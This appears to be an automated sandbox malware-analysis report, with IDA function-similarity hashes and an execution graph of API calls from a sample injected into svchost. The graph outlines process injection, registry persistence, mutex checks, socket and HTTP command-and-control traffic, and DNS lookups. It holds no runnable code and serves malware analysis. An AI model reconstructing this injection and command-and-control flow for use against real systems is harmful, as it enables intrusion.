                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memset_strlen
                                                                                                                                                                                • String ID: duB
                                                                                                                                                                                • API String ID: 2279092321-2047154145
                                                                                                                                                                                • Opcode ID: 8ef916ac99e2acd8d5d850c8b0a63cac94112d2d259028affcb04b3b3e16ebb3
                                                                                                                                                                                • Instruction ID: c505e5f8326b13ea594a17ca5410903a82e5ac8279d4bf993f0f99441c28ac3a
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ef916ac99e2acd8d5d850c8b0a63cac94112d2d259028affcb04b3b3e16ebb3
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F913BB5D00218AFDB54CFD8D880BAEB7B5BF48318F14C159E909A7341EB35AA85CF51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memset
                                                                                                                                                                                • String ID: d$d
                                                                                                                                                                                • API String ID: 2102423945-195624457
                                                                                                                                                                                • Opcode ID: 9623b1273be0775a15697b469d724f7f2ac93ca0881c6a5774c0b2da6d5538b3
                                                                                                                                                                                • Instruction ID: 6121a1327febe31ce23874249aa6888692dbc835ca9b57b63cb1d65f5ac047f3
                                                                                                                                                                                • Opcode Fuzzy Hash: 9623b1273be0775a15697b469d724f7f2ac93ca0881c6a5774c0b2da6d5538b3
                                                                                                                                                                                • Instruction Fuzzy Hash: C79138B4E44218EBEB14DF94D484AEEB7B1FF49308F108559E816BB360D375EA81CB91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memset_strlen
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 2279092321-2766056989
                                                                                                                                                                                • Opcode ID: 465e3f5f656527acc1b894b08e49c7e6ede76f44b8deec7e1eed15ce09421514
                                                                                                                                                                                • Instruction ID: 9095bb450417fa4dd51ea0b819b640531f396c38f351a606dd718691427917c8
                                                                                                                                                                                • Opcode Fuzzy Hash: 465e3f5f656527acc1b894b08e49c7e6ede76f44b8deec7e1eed15ce09421514
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B1142B5E00208FFDB10DFE4DD45BEE77B4AB48314F508254E61477280E635BA458B65
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:7%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:16.7%
                                                                                                                                                                                Signature Coverage:2.5%
                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                Total number of Limit Nodes:20
                                                                                                                                                                                execution_graph 10017 40019c0 10018 40019cd 10017->10018 10028 4001750 10018->10028 10022 4001b5b 10023 40019de 10031 4002120 10023->10031 10025 4001ae8 10026 4001b53 Sleep 10025->10026 10027 4001b1d CreateThread CreateThread 10025->10027 10026->10022 10027->10025 10046 4001b70 10027->10046 10067 4001cd0 WSAStartup 10027->10067 10045 4001900 GetPEB 10028->10045 10030 4001788 10030->10023 10032 4001ad0 10031->10032 10033 4002137 10031->10033 10032->10022 10042 4002080 10032->10042 10033->10032 10034 400214b lstrlenA lstrlenA 10033->10034 10035 4002173 10034->10035 10036 40021b0 VirtualAlloc 10035->10036 10037 400217b StrStrIA 10035->10037 10036->10032 10039 40021d9 10036->10039 10037->10035 10038 40021ac 10037->10038 10038->10036 10039->10032 10040 40021ef StrStrIA 10039->10040 10040->10032 10041 4002209 lstrcpynA 10040->10041 10041->10039 10043 4002090 QueryPerformanceCounter 10042->10043 10044 400208c 10042->10044 10043->10044 10044->10025 10045->10030 10084 4001030 10046->10084 10048 4001b86 10049 4001b94 CoInitialize VirtualAlloc 10048->10049 10050 4001cbf 10048->10050 10051 4001bd2 10049->10051 10052 4001cb4 10049->10052 10055 4002080 QueryPerformanceCounter 10051->10055 10062 4001c86 VirtualFree 10051->10062 10063 4001c8a 10051->10063 10108 4001070 10052->10108 10056 4001be5 wsprintfA 10055->10056 10057 4002080 QueryPerformanceCounter 10056->10057 10058 4001c1d 10057->10058 10087 40020b0 10058->10087 10091 40010a0 10058->10091 10062->10052 10065 4002080 QueryPerformanceCounter 10063->10065 10066 4001c94 Sleep 10065->10066 10066->10051 10068 4001f90 10067->10068 10069 4001cf8 VirtualAlloc 10067->10069 10069->10068 10082 4001d29 10069->10082 10070 4002080 QueryPerformanceCounter 10071 4001d53 htons 10070->10071 10072 4001dcd gethostbyname 10071->10072 10071->10082 10072->10082 10073 4001db0 inet_addr 10073->10082 10074 4001e12 socket 10075 4001e31 setsockopt setsockopt connect 10074->10075 10074->10082 10076 4001f2a closesocket Sleep 10075->10076 10075->10082 10076->10082 10077 4002080 QueryPerformanceCounter 10077->10082 10078 4001f75 VirtualFree 10078->10068 10080 40020b0 QueryPerformanceCounter 10080->10082 10082->10070 10082->10072 10082->10073 10082->10074 10082->10076 10082->10077 10082->10078 10082->10080 10111 4001fa0 10082->10111 10115 4002000 10082->10115 10085 4001040 InternetOpenA 10084->10085 10086 4001039 10084->10086 10085->10048 10086->10085 10088 4002109 10087->10088 10090 40020c3 10087->10090 10088->10058 10089 40020e3 QueryPerformanceCounter 10089->10090 10090->10088 10090->10089 10092 400138a Sleep 10091->10092 10093 40010ba 10091->10093 10092->10051 10093->10092 10094 4001110 InternetCrackUrlA 10093->10094 10094->10092 10095 4001166 InternetOpenA 10094->10095 10095->10092 10096 400118c InternetConnectA 10095->10096 10097 40011c5 HttpOpenRequestA 10096->10097 10098 400137d InternetCloseHandle 10096->10098 10099 4001370 InternetCloseHandle 10097->10099 10100 4001203 wnsprintfA HttpAddRequestHeadersA 10097->10100 10098->10092 10099->10098 10101 4001363 InternetCloseHandle 10100->10101 10105 4001241 10100->10105 10101->10099 10102 4001255 HttpSendRequestA 10103 4001329 GetLastError 10102->10103 10102->10105 10103->10105 10104 40012fe InternetReadFile 10104->10104 10104->10105 10105->10101 10105->10102 10105->10104 10106 400128f InternetReadFile 10105->10106 10107 40012ce 10106->10107 10107->10105 10107->10106 10109 4001081 InternetCloseHandle 10108->10109 10110 4001091 CoUninitialize 10108->10110 10109->10110 10110->10050 10112 4001fb2 10111->10112 10114 4001fac 10111->10114 10112->10082 10113 4001fc3 send 10113->10112 10113->10114 10114->10112 10114->10113 10117 400200c 10115->10117 10118 4002012 10115->10118 10116 4002027 recv 10116->10117 10116->10118 10117->10116 10117->10118 10118->10082 10119 13143519 10122 13143540 10119->10122 10123 1314332d 10122->10123 10155 13145417 10123->10155 10126 1314335b 10160 13144ec5 GetTickCount 10126->10160 10129 13143360 10161 131462ac 10129->10161 10131 13143365 10167 13144bc5 HeapCreate 10131->10167 10134 131433c6 OpenMutexA 10135 131433b1 CloseHandle Sleep 10134->10135 10136 131433ce 10134->10136 10135->10134 10173 13142fec 10136->10173 10138 131433d3 10139 13143353 ExitProcess 10138->10139 10140 131433dd GetTickCount 10138->10140 10228 1314ad3e 10140->10228 10144 131433f1 10247 131456dc 10144->10247 10146 131433f6 10146->10139 10250 13143202 GetCurrentThreadId CreateThread 10146->10250 10149 13143410 10284 1314e012 GetSystemTime 10149->10284 10150 13143403 10259 131451e8 10150->10259 10334 131453cc 10155->10334 10158 1314333e WSAStartup 10158->10126 10158->10139 10159 13145422 CreateFileA 10159->10158 10160->10129 10345 13146203 10161->10345 10163 131462ba htons socket 10165 13146316 GetLastError 10163->10165 10166 13146320 10163->10166 10165->10131 10166->10131 10168 1314337f 10167->10168 10169 13144bdd HeapCreate 10167->10169 10168->10134 10168->10139 10170 13144bf5 HeapCreate 10169->10170 10171 13144c12 10169->10171 10170->10171 10172 13144c07 GetProcessHeap 10170->10172 10171->10168 10172->10171 10355 13144fe4 10173->10355 10175 13143001 10177 1314300f 10175->10177 10369 1315112e 10175->10369 10178 13143029 GetVersion 10177->10178 10179 1314303f 10178->10179 10184 13143046 10178->10184 10181 13144fe4 HeapAlloc 10179->10181 10180 13142f79 lstrlenA 10182 1314306c 10180->10182 10181->10184 10360 13150795 10182->10360 10184->10180 10186 13143099 10187 13142f79 lstrlenA 10186->10187 10188 131430a3 StrStrIA 10187->10188 10189 131430b1 10188->10189 10190 13142f79 lstrlenA 10189->10190 10191 131430cf inet_addr 10190->10191 10192 13142f79 lstrlenA 10191->10192 10193 131430e3 10192->10193 10194 13150795 19 API calls 10193->10194 10195 131430f1 10194->10195 10196 13142f79 lstrlenA 10195->10196 10197 131430fe 10196->10197 10198 13150795 19 API calls 10197->10198 10199 1314310c 10198->10199 10200 13142f79 lstrlenA 10199->10200 10201 13143119 10200->10201 10202 13150795 19 API calls 10201->10202 10203 13143127 10202->10203 10204 13142f79 lstrlenA 10203->10204 10205 13143137 10204->10205 10206 13150795 19 API calls 10205->10206 10207 13143145 10206->10207 10208 13142f79 lstrlenA 10207->10208 10209 13143158 10208->10209 10210 13150795 19 API calls 10209->10210 10211 13143166 10210->10211 10212 13142f79 lstrlenA 10211->10212 10213 13143173 10212->10213 10214 13150795 19 API calls 10213->10214 10215 13143181 10214->10215 10216 13142f79 lstrlenA 10215->10216 10217 1314318e 10216->10217 10218 13150795 19 API calls 10217->10218 10219 1314319c 10218->10219 10220 13142f79 lstrlenA 10219->10220 10221 131431a9 10220->10221 10222 13150795 19 API calls 10221->10222 10223 131431b7 10222->10223 10224 13142f79 lstrlenA 10223->10224 10225 131431c4 10224->10225 10226 13150795 19 API calls 10225->10226 10227 13143092 10226->10227 10227->10138 10229 13142f79 lstrlenA 10228->10229 10230 1314ad63 RegOpenKeyExA 10229->10230 10231 1314ad76 10230->10231 10232 131433ec 10230->10232 10233 13142f79 lstrlenA 10231->10233 10235 131432c5 10232->10235 10234 1314ad8a RegSetValueExA RegCloseKey 10233->10234 10234->10232 10236 13144fe4 HeapAlloc 10235->10236 10237 131432cc 10236->10237 10238 131432d6 10237->10238 10239 131432d7 InitializeCriticalSection 10237->10239 10238->10144 10240 13144fe4 HeapAlloc 10239->10240 10241 131432e8 10240->10241 10242 13143306 10241->10242 10243 131432f2 InitializeCriticalSection 10241->10243 10242->10144 10244 13144fe4 HeapAlloc 10243->10244 10245 131432fc 10244->10245 10245->10242 10246 1314330a InitializeCriticalSection CreateMutexA 10245->10246 10246->10144 10248 13144fe4 HeapAlloc 10247->10248 10249 131456e8 10248->10249 10249->10146 10251 13143232 10250->10251 10252 13143239 CreateThread 10250->10252 10555 1314ac80 10250->10555 10251->10149 10251->10150 10252->10251 10253 1314324d Sleep 10252->10253 10543 1314e325 GetTickCount 10252->10543 10254 13143263 10253->10254 10255 13143281 CreateThread 10254->10255 10256 1314326c Sleep 10254->10256 10255->10251 10257 13143296 CreateThread 10255->10257 10523 1314609a 10255->10523 10256->10254 10256->10255 10257->10251 10258 131432aa CreateThread 10257->10258 10594 13144898 10257->10594 10258->10251 10568 1314ccd7 10258->10568 10260 13145205 10259->10260 10261 131451f9 10259->10261 11655 1314515f OpenProcessToken 10260->11655 10261->10260 10263 1314340b 10261->10263 10263->10139 10264 1314520a 10265 1314525c GetCommandLineA 10264->10265 10266 1314527d 10265->10266 10267 1314526c StrStrA 10265->10267 10268 13144dc2 2 API calls 10266->10268 10267->10266 10269 13145291 10268->10269 10270 1314529b CreateProcessA 10269->10270 10274 13142f79 lstrlenA 10269->10274 10277 13144dc2 2 API calls 10269->10277 10270->10269 10271 131452b8 VirtualAllocEx 10270->10271 10272 13145311 10271->10272 10273 131452d9 TerminateProcess 10271->10273 10275 131453c0 10272->10275 10276 1314531b WriteProcessMemory 10272->10276 10273->10269 10274->10269 10275->10263 10276->10275 10281 13145339 10276->10281 10277->10269 10278 1314539b CreateRemoteThread 10279 131453b7 CloseHandle 10278->10279 10280 131453b1 GetLastError 10278->10280 10279->10275 10280->10279 10281->10278 10282 13145396 10281->10282 10283 1314537d WriteProcessMemory 10281->10283 10282->10278 10283->10275 10283->10281 11662 1314ffd0 10284->11662 10286 1314e02e GetTickCount GetTickCount 10310 1314e076 10286->10310 10287 13144ea1 EnterCriticalSection 10287->10310 10289 1314e0e5 socket 10292 1314e31e ExitProcess 10289->10292 10289->10310 10290 1314e0d2 shutdown closesocket 10290->10289 10291 1314e18c 10293 1314e297 shutdown closesocket 10291->10293 10294 1314e1a3 OpenMutexA 10291->10294 10300 13144c1f ctype 3 API calls 10291->10300 10308 13144c1f ctype 3 API calls 10291->10308 10291->10310 10317 131506ce lstrcmpA lstrcmpA 10291->10317 10319 13144ea1 EnterCriticalSection 10291->10319 10322 1314e20c closesocket 10291->10322 10323 13142f79 lstrlenA 10291->10323 10325 131506ce 2 API calls 10291->10325 10327 13144eb3 LeaveCriticalSection 10291->10327 11692 1314dae3 10291->11692 11762 1314df53 10291->11762 10296 1314e325 GetTickCount 10292->10296 10299 13142f79 lstrlenA 10293->10299 10294->10291 10297 1314e1b9 CreateMutexA 10294->10297 10295 13142f79 lstrlenA 10295->10310 10320 1314e352 10296->10320 10297->10291 10299->10291 10302 1314e1d5 GetTickCount 10300->10302 10301 131506ce 2 API calls 10301->10310 11737 1314df98 10302->11737 10303 1314e362 htons 10303->10320 10305 1314e13b htons connect 10306 1314e169 GetLastError Sleep 10305->10306 10305->10310 10306->10310 10307 13144eb3 LeaveCriticalSection 10307->10310 10308->10291 10310->10287 10310->10289 10310->10290 10310->10291 10310->10295 10310->10301 10310->10305 10310->10307 11664 13145b7d 10310->11664 11689 1314d177 10310->11689 10311 13142f79 lstrlenA 10312 1314e3a1 DnsQuery_A 10311->10312 10312->10320 10313 1314e3fb socket setsockopt connect 10315 1314e451 closesocket 10313->10315 10316 1314e441 recv 10313->10316 10314 13142f79 lstrlenA 10314->10320 10315->10320 10316->10315 10317->10291 10318 1314e3d2 DnsRecordListFree 10318->10320 10319->10291 10320->10303 10320->10311 10320->10313 10320->10314 10320->10318 10321 131506ce 2 API calls 10320->10321 10326 1314e4bc Sleep 10320->10326 10321->10320 10322->10291 10323->10291 10328 1314e237 GetTickCount 10325->10328 10326->10320 10327->10291 10328->10310 10329 1314e24f Sleep 10328->10329 10330 13142f79 lstrlenA 10329->10330 10331 1314e265 10330->10331 10332 131506ce 2 API calls 10331->10332 10333 1314e274 GetTickCount 10332->10333 10333->10291 10333->10329 10341 13142f79 10334->10341 10337 13145414 10337->10158 10337->10159 10338 131453f6 PathAddBackslashA 10339 13142f79 lstrlenA 10338->10339 10340 13145407 PathAppendA 10339->10340 10340->10337 10342 13142f89 GetEnvironmentVariableA 10341->10342 10343 13142f8f 10341->10343 10342->10337 10342->10338 10344 13142fdb lstrlenA 10343->10344 10344->10342 10346 13146213 10345->10346 10347 1314620f 10345->10347 10348 13146220 gethostname gethostbyname 10346->10348 10347->10163 10348->10347 10349 1314623b 10348->10349 10350 13146253 LoadLibraryA 10349->10350 10351 13146267 GetProcAddress 10350->10351 10354 1314627e 10350->10354 10352 13146277 FreeLibrary 10351->10352 10353 13146282 SendARP FreeLibrary 10351->10353 10352->10354 10353->10354 10354->10163 10356 13144f66 10355->10356 10357 13144f77 HeapAlloc 10356->10357 10358 13144f73 10356->10358 10359 13144f8d 10357->10359 10358->10175 10359->10175 10361 131507a4 10360->10361 10368 1314307d GetCommandLineA 10360->10368 10376 13144fe9 10361->10376 10364 131507c8 10381 131504ae 10364->10381 10368->10186 10368->10227 10518 131510bc 10369->10518 10371 13151139 10372 13144fe4 HeapAlloc 10371->10372 10373 13151147 10372->10373 10374 13151153 10373->10374 10375 131510bc InitializeCriticalSection 10373->10375 10374->10177 10375->10374 10377 13144ff0 wnsprintfA 10376->10377 10378 13144ff3 10376->10378 10377->10364 10377->10368 10433 13144f66 10378->10433 10380 13144ffc 10380->10377 10382 131504c3 10381->10382 10383 131505e9 10381->10383 10382->10383 10384 131504cd StrStrA 10382->10384 10426 13144c1f 10383->10426 10385 13150585 StrStrA 10384->10385 10386 131504e8 10384->10386 10388 13150594 StrStrA 10385->10388 10389 131505f1 10385->10389 10437 13145107 10386->10437 10388->10389 10391 131505a0 10388->10391 10395 1315040e lstrcmpA 10389->10395 10390 131504f0 10443 1315040e 10390->10443 10393 13144fe9 HeapAlloc 10391->10393 10396 131505ab 10393->10396 10398 13150605 10395->10398 10403 131505b4 wnsprintfA 10396->10403 10397 13150511 StrStrA 10397->10383 10400 1315051f 10397->10400 10401 13150642 10398->10401 10402 1315060c 10398->10402 10406 131504ae 11 API calls 10400->10406 10469 13150450 10401->10469 10409 1315062d 10402->10409 10410 1315061a 10402->10410 10403->10383 10404 131505d0 10403->10404 10407 131504ae 11 API calls 10404->10407 10419 13150535 10406->10419 10411 1315057c 10407->10411 10412 1315035b 6 API calls 10409->10412 10459 131502cc 10410->10459 10418 13144c1f ctype 3 API calls 10411->10418 10412->10383 10413 1315068a 10413->10383 10420 13145107 2 API calls 10413->10420 10414 13150574 StrStrA 10414->10411 10417 1315053b StrStrA 10414->10417 10416 1315065b 10421 1315067a 10416->10421 10422 1315066c 10416->10422 10417->10419 10418->10383 10419->10411 10419->10414 10425 131504ae 11 API calls 10419->10425 10420->10383 10485 13150217 10421->10485 10473 13150155 10422->10473 10425->10419 10427 13144c28 IsBadReadPtr 10426->10427 10432 13144c65 10426->10432 10428 13144c38 10427->10428 10427->10432 10429 13144c43 IsBadReadPtr 10428->10429 10428->10432 10430 13144c51 HeapFree 10429->10430 10431 13144c4c 10429->10431 10430->10432 10431->10430 10432->10368 10434 13144f77 HeapAlloc 10433->10434 10435 13144f73 10433->10435 10436 13144f8d 10434->10436 10435->10380 10436->10380 10438 13145128 10437->10438 10439 13145119 10437->10439 10441 13144fe9 HeapAlloc 10438->10441 10442 1314512f 10438->10442 10494 13144d5c 10439->10494 10441->10442 10442->10390 10445 1315041a 10443->10445 10446 1315041f 10443->10446 10444 13150427 lstrcmpA 10444->10445 10444->10446 10445->10397 10447 1315035b 10445->10447 10446->10444 10446->10445 10448 13150372 10447->10448 10458 1315036a 10447->10458 10498 13145006 10448->10498 10451 13144d5c IsBadReadPtr 10452 13150396 10451->10452 10453 13144fe9 HeapAlloc 10452->10453 10452->10458 10454 131503a9 10453->10454 10505 13144dc2 10454->10505 10457 13150217 6 API calls 10457->10458 10458->10397 10460 131502e0 10459->10460 10468 131502db 10459->10468 10461 13145006 3 API calls 10460->10461 10460->10468 10462 131502f6 10461->10462 10463 13144d5c IsBadReadPtr 10462->10463 10464 13150309 10463->10464 10465 13145107 2 API calls 10464->10465 10464->10468 10466 13150318 10465->10466 10467 13150155 6 API calls 10466->10467 10467->10468 10468->10383 10470 1315045c 10469->10470 10472 13150461 10469->10472 10470->10413 10470->10416 10471 1315047c lstrcmpA 10471->10470 10471->10472 10472->10470 10472->10471 10474 13150167 10473->10474 10475 131501fa 10473->10475 10476 13145006 3 API calls 10474->10476 10475->10383 10477 13150184 10476->10477 10479 13144d5c IsBadReadPtr 10477->10479 10484 131501e6 10477->10484 10478 13145107 2 API calls 10478->10475 10480 131501a3 10479->10480 10480->10475 10481 13144fe9 HeapAlloc 10480->10481 10482 131501bd 10481->10482 10483 13144dc2 2 API calls 10482->10483 10483->10484 10484->10475 10484->10478 10486 13145006 3 API calls 10485->10486 10487 1315023d 10486->10487 10488 131502a2 10487->10488 10489 13144d5c IsBadReadPtr 10487->10489 10488->10383 10490 1315025f 10489->10490 10490->10488 10491 13144fe9 HeapAlloc 10490->10491 10492 13150279 10491->10492 10493 13144dc2 2 API calls 10492->10493 10493->10488 10496 13144d6a 10494->10496 10497 13144d71 10494->10497 10495 13144d92 IsBadReadPtr 10495->10496 10495->10497 10496->10438 10497->10495 10497->10496 10499 13145013 10498->10499 10500 1314500f 10498->10500 10501 13145023 10499->10501 10502 1314501c 10499->10502 10500->10451 10510 13144f9e 10501->10510 10503 13144f66 HeapAlloc 10502->10503 10503->10500 10506 13144dd1 10505->10506 10509 13144e11 10505->10509 10507 13144de4 IsBadWritePtr 10506->10507 10506->10509 10508 13144df2 IsBadReadPtr 10507->10508 10507->10509 10508->10506 10508->10509 10509->10457 10509->10458 10511 13144fae 10510->10511 10512 13144faa 10510->10512 10513 13144fb4 10511->10513 10514 13144fbf IsBadReadPtr 10511->10514 10512->10500 10516 13144f66 HeapAlloc 10513->10516 10514->10512 10515 13144fce HeapReAlloc 10514->10515 10515->10500 10517 13144fbc 10516->10517 10517->10500 10521 13144d0b 10518->10521 10520 131510c9 InitializeCriticalSection 10520->10371 10522 13144d16 _memset 10521->10522 10522->10520 10524 131461f5 10523->10524 10538 131460b3 10523->10538 10526 13142f79 lstrlenA 10526->10538 10528 13144eb3 LeaveCriticalSection 10528->10538 10530 131460ed Sleep 10530->10538 10531 1314613c Sleep 10531->10538 10532 13144ea1 EnterCriticalSection 10532->10538 10534 13146176 10684 1315181b EnterCriticalSection 10534->10684 10689 13144eb3 10534->10689 10536 131461fa Sleep 10536->10536 10537 13144fe4 HeapAlloc 10537->10538 10538->10524 10538->10526 10538->10528 10538->10530 10538->10531 10538->10532 10538->10534 10538->10536 10538->10537 10634 13145706 10538->10634 10645 131506ce 10538->10645 10651 1315196c EnterCriticalSection LeaveCriticalSection 10538->10651 10652 13151233 EnterCriticalSection 10538->10652 10665 13151183 EnterCriticalSection 10538->10665 10681 13144c6b 10538->10681 10553 1314e352 10543->10553 10544 1314e362 htons 10544->10553 10545 13142f79 lstrlenA 10546 1314e3a1 DnsQuery_A 10545->10546 10546->10553 10547 1314e3fb socket setsockopt connect 10549 1314e451 closesocket 10547->10549 10550 1314e441 recv 10547->10550 10548 13142f79 lstrlenA 10548->10553 10549->10553 10550->10549 10551 1314e3d2 DnsRecordListFree 10551->10553 10552 131506ce 2 API calls 10552->10553 10553->10544 10553->10545 10553->10547 10553->10548 10553->10551 10553->10552 10554 1314e4bc Sleep 10553->10554 10554->10553 10556 131453cc 4 API calls 10555->10556 10557 1314ac93 lstrlenA 10556->10557 10558 1314aca9 10557->10558 10559 1314aca2 Sleep 10558->10559 10560 1314acb2 wnsprintfA 10558->10560 10559->10558 10563 1314accc 10560->10563 10561 13142f79 lstrlenA 10562 1314ace1 RegOpenKeyExA 10561->10562 10562->10563 10564 1314ad35 Sleep 10562->10564 10563->10561 10563->10564 10565 13144d5c IsBadReadPtr 10563->10565 10566 13142f79 lstrlenA 10563->10566 10564->10563 10565->10563 10567 1314ad1f RegSetValueExA RegCloseKey 10566->10567 10567->10564 10569 13144fe4 HeapAlloc 10568->10569 10584 1314ccff 10569->10584 10570 1314cd05 Sleep 10570->10584 10571 13144ea1 EnterCriticalSection 10571->10584 10573 1314cd96 select 10757 13144ea1 10573->10757 10576 1314ce03 __WSAFDIsSet 10576->10584 10591 1314cd7c 10576->10591 10577 13144eb3 LeaveCriticalSection 10577->10584 10584->10570 10584->10571 10584->10573 10584->10576 10584->10577 10584->10591 10732 131518cb EnterCriticalSection 10584->10732 10805 1315185f EnterCriticalSection 10584->10805 10838 1314c137 10584->10838 11131 13151bd5 10584->11131 10585 1314cf4f GetTickCount 10585->10584 10589 1314c071 58 API calls 10589->10591 10590 13144c1f IsBadReadPtr IsBadReadPtr HeapFree ctype 10590->10591 10591->10573 10591->10584 10591->10589 10591->10590 10592 131513cf 7 API calls 10591->10592 10593 1315185f 12 API calls 10591->10593 10739 1314bd91 10591->10739 10760 1314be9a 10591->10760 10780 1314b0d3 10591->10780 10798 1314b1b8 10591->10798 10814 1314bbf8 10591->10814 10833 1314bd05 htons 10591->10833 11125 1314c0bc 10591->11125 10592->10591 10593->10584 10595 13144fe9 HeapAlloc 10594->10595 10596 131448c1 10595->10596 10597 13142f79 lstrlenA 10596->10597 10598 131448d7 10597->10598 11503 131441b1 10598->11503 10601 13142f79 lstrlenA 10602 131448f4 10601->10602 10603 131441b1 35 API calls 10602->10603 10604 131448fc 10603->10604 10605 13142f79 lstrlenA 10604->10605 10606 1314490f 10605->10606 10607 131441b1 35 API calls 10606->10607 10608 13144917 10607->10608 10609 1314492d 10608->10609 10611 13144926 ExitProcess 10608->10611 10610 13142f79 lstrlenA 10609->10610 10612 13144938 10610->10612 10613 131506ce 2 API calls 10612->10613 10614 13144946 10613->10614 10615 13144fe9 HeapAlloc 10614->10615 10616 13144973 10615->10616 10617 13144fe9 HeapAlloc 10616->10617 10622 131449a3 10616->10622 10617->10616 10618 13144b13 Sleep 10618->10622 10619 13144b27 11517 13143e2a 10619->11517 10620 13144ea1 EnterCriticalSection 10620->10622 10622->10618 10622->10619 10622->10620 10625 13144eb3 LeaveCriticalSection 10622->10625 10633 13144a0d 10622->10633 10624 13144c1f ctype 3 API calls 10626 13144b3e 10624->10626 10627 13144af3 Sleep 10625->10627 10627->10622 10629 1314ea4e 7 API calls 10629->10633 10630 13144a57 CreateThread 10630->10633 10631 13144c1f IsBadReadPtr IsBadReadPtr HeapFree ctype 10631->10633 10632 1314eac9 8 API calls 10632->10633 10633->10622 10633->10629 10633->10630 10633->10631 10633->10632 11513 13143dc2 10633->11513 10635 13145716 10634->10635 10636 1314571a 10634->10636 10635->10538 10638 1314572b 10636->10638 10639 13145785 GetTickCount 10636->10639 10692 13150d2c 10636->10692 10638->10538 10639->10636 10642 13145790 10639->10642 10640 13142f79 lstrlenA 10640->10642 10642->10636 10642->10640 10643 131506ce 2 API calls 10642->10643 10644 131457f7 10642->10644 10696 13150c26 10642->10696 10643->10642 10644->10638 10647 131506d8 10645->10647 10650 131506f8 10645->10650 10646 1315040e lstrcmpA 10646->10647 10647->10646 10648 13150701 10647->10648 10647->10650 10649 13150450 lstrcmpA 10648->10649 10649->10650 10650->10538 10651->10538 10653 13151276 10652->10653 10654 13151266 LeaveCriticalSection 10652->10654 10714 1314ea4e 10653->10714 10655 1315126f 10654->10655 10655->10538 10658 131512a1 LeaveCriticalSection 10658->10655 10659 13142f79 lstrlenA 10660 131512f5 10659->10660 10661 131506ce 2 API calls 10660->10661 10662 13151304 10661->10662 10663 1315130e setsockopt 10662->10663 10664 13151328 10662->10664 10663->10664 10664->10658 10666 131511a4 10665->10666 10670 131511d2 10665->10670 10668 13144c1f ctype 3 API calls 10666->10668 10666->10670 10668->10670 10722 1314eac9 10670->10722 10671 13144c1f ctype 3 API calls 10672 131511f5 10671->10672 10673 13144c1f ctype 3 API calls 10672->10673 10674 13151200 10673->10674 10675 13144c1f ctype 3 API calls 10674->10675 10676 1315120b 10675->10676 10677 13144c1f ctype 3 API calls 10676->10677 10678 13151216 10677->10678 10679 13144c1f ctype 3 API calls 10678->10679 10680 13151221 LeaveCriticalSection 10679->10680 10680->10538 10682 13144c1f ctype 3 API calls 10681->10682 10683 13144c79 10682->10683 10683->10538 10685 13151843 10684->10685 10688 13151832 LeaveCriticalSection 10684->10688 10687 13144fe4 HeapAlloc 10685->10687 10687->10688 10688->10534 10690 13144ec4 Sleep 10689->10690 10691 13144eba LeaveCriticalSection 10689->10691 10690->10538 10691->10690 10693 13150d4d 10692->10693 10695 13150d3a 10692->10695 10693->10636 10694 13150c26 3 API calls 10694->10695 10695->10693 10695->10694 10697 13150c3f 10696->10697 10713 13150c38 10696->10713 10698 13150c93 10697->10698 10700 13142f79 lstrlenA 10697->10700 10697->10713 10699 13150cc3 10698->10699 10701 13142f79 lstrlenA 10698->10701 10698->10713 10702 13150cef 10699->10702 10705 13142f79 lstrlenA 10699->10705 10699->10713 10703 13150c84 10700->10703 10704 13150cb4 10701->10704 10709 13142f79 lstrlenA 10702->10709 10702->10713 10706 131506ce 2 API calls 10703->10706 10707 131506ce 2 API calls 10704->10707 10708 13150ce0 10705->10708 10706->10698 10707->10699 10710 131506ce 2 API calls 10708->10710 10711 13150d07 10709->10711 10710->10702 10712 131506ce 2 API calls 10711->10712 10712->10713 10713->10642 10715 13144fe9 HeapAlloc 10714->10715 10716 1314ea5e 10715->10716 10717 1314ea73 socket ioctlsocket 10716->10717 10718 1314ea9f socket 10716->10718 10719 1314eaaf 10717->10719 10718->10719 10720 1314eac1 10719->10720 10721 13144c1f ctype 3 API calls 10719->10721 10720->10658 10720->10659 10721->10720 10723 1314ead5 10722->10723 10731 1314eb29 10722->10731 10724 1314eadb IsBadReadPtr 10723->10724 10723->10731 10725 1314eae8 10724->10725 10724->10731 10726 1314eb0d 10725->10726 10727 1314eaee WSASetLastError shutdown WSAGetLastError closesocket 10725->10727 10728 13144c1f ctype 3 API calls 10726->10728 10730 1314eb1e 10726->10730 10727->10726 10728->10730 10729 13144c1f ctype 3 API calls 10729->10731 10730->10729 10731->10671 10733 131518f5 10732->10733 10734 131518ea LeaveCriticalSection 10732->10734 10736 131518fd LeaveCriticalSection 10733->10736 10738 1315190d LeaveCriticalSection 10733->10738 10735 13151906 10734->10735 10735->10584 10736->10735 10738->10735 10740 1314bda7 10739->10740 